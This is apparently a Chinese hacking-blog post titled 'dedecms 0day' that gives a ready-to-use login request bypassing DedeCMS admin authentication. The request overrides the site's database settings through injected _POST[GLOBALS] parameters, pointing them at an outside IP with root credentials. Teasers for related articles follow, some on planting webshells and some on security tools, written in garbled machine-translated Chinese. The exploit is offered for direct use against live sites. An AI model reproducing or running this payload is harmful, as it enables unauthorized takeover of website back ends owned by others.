织梦网dedecms 0day

hacker5年前黑客文章634

把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。

http://www.123.com/织梦网站后台/login.php?dopost=login

&validate=dcug&userid=admin&pwd=inimda

&_POST[GLOBALS][cfg_dbhost]=116.255.183.90

&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0

&_POST[GLOBALS][cfg_dbname]=root

标签: 黑客技术

相关文章

Rar.exe在WEBSHELL中的用法和原理

Rar.exe在WEBSHELL中的用法和原理

rar.exe是什么?它是winrar自带的命令行解压程序。用于DOS命令配合其参数代码就能灵活运用在提权中,经常用在打包下载的各种文件。   用法: 得到了Websh...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Scapy? Scapy是一种十分火爆且有效的数据文件解决专用工具,能够 根据实际操作数据文件来工作中。Scapy能够 在普遍的协议书范畴内编解码数据文件,将其发送至网上,捕捉,关系推送恳求和...

TourEx旅游网站管理系统后台拿webshell

TourEx旅游网站管理系统 百度不到。 模板管理-/car/booking.html  编辑 burp抓包,改为/admin/Admin_TemplateEdit.a...

什么叫Wireshark?该专用工具是一个互联网排序解析器

什么叫Wireshark?该专用工具是一个互联网排序解析器

什么叫Wireshark? 该专用工具是一个互联网排序解析器,这类专用工具将试着捕捉用以剖析,网络问题清除,文化教育,手机软件和通讯协议开发设计的互联网数据文件,并显示信息尽量详尽的获得的数据文件数...

Kismet是完全免费的吗?

Kismet是完全免费的吗?

什么叫Kismet? Kismet是802.11无线网络的排序嗅探器,互联网探测器和入侵防御系统系统软件。该专用工具将与适用初始监控器方式的别的无线卡一起应用,而且还能够网络嗅探802.11a,80...

w3af是不是适用全部电脑操作系统?

w3af是不是适用全部电脑操作系统?

什么叫w3af? w3af是搜索和开发设计Web程序运行系统漏洞最时兴,灵便和强劲的专用工具之一。它非常容易应用,它出示了数十种开发设计和网页页面评定软件的作用。别人则将其称之为以互联网为管理中心的...